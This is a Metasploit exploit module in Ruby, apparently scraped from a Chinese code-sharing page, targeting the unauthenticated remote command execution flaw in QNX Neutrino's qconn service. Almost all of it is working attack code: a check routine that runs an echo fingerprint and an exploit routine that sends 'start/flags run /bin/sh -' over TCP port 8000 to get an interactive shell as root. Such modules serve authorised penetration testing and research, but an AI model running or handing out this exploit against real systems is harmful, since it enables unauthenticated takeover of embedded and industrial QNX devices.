扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 |
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info={}) super(update_info(info, 'Name' => "QNX QCONN Remote Command Execution Vulnerability", 'Description'=> %q{ This module exploits a vulnerability in the qconn component of QNX Neutrino which can be abused to allow unauthenticated users to execute arbitrary commands under the context of the 'root' user. }, 'License'=> MSF_LICENSE, 'Author' => [ 'David Odell', # Discovery 'Mor!p3r <moriper[at]gmail.com>', # PoC 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit ], 'References' => [ ['EDB', '21520'], ['URL', 'http://www.fishnetsecurity.com/6labs/blog/pentesting-qnx-neutrino-rtos'], ['URL', 'http://www.qnx.com/developers/docs/6.3.0SP3/neutrino/utilities/q/qconn.html'], ], 'Payload'=> { 'BadChars'=> '', 'DisableNops' => true, 'Compat'=> { 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find', }, }, 'DefaultOptions'=> { 'WfsDelay' => 10, 'PAYLOAD'=> 'cmd/unix/interact', }, 'Platform' => 'unix',# QNX Neutrino 'Arch' => ARCH_CMD, 'Targets'=> [ # Tested on QNX Neutrino 6.5 SP1 ['Automatic Targeting', { 'auto' => true }] ], 'Privileged' => false, 'DisclosureDate' => 'Sep 4 2012', 'DefaultTarget'=> 0)) register_options( [ Opt::RPORT(8000) ], self.class) end def check @peer = "#{rhost}:#{rport}" # send check fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4) print_status("#{@peer} - Sending check") connect req= "service launcher\n" req << "start/flags run /bin/echo /bin/echo #{fingerprint}\n" sock.put(req) res= sock.get disconnect # check response ifres and res =~ /#{fingerprint}/ return Exploit::CheckCode::Vulnerable elsif res and res =~ /QCONN/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Unknown end end def exploit @peer = "#{rhost}:#{rport}" # send payload req= "service launcher\n" req << "start/flags run /bin/sh -\n" print_status("#{@peer} - Sending payload (#{req.length} bytes)") connect sock.put(req) res= sock.get # check response if res and res =~ /No controlling tty/ print_good("#{@peer} - Payload sent successfully") else print_error("#{@peer} - Sending payload failed") end handler disconnect end end |
体验盒子
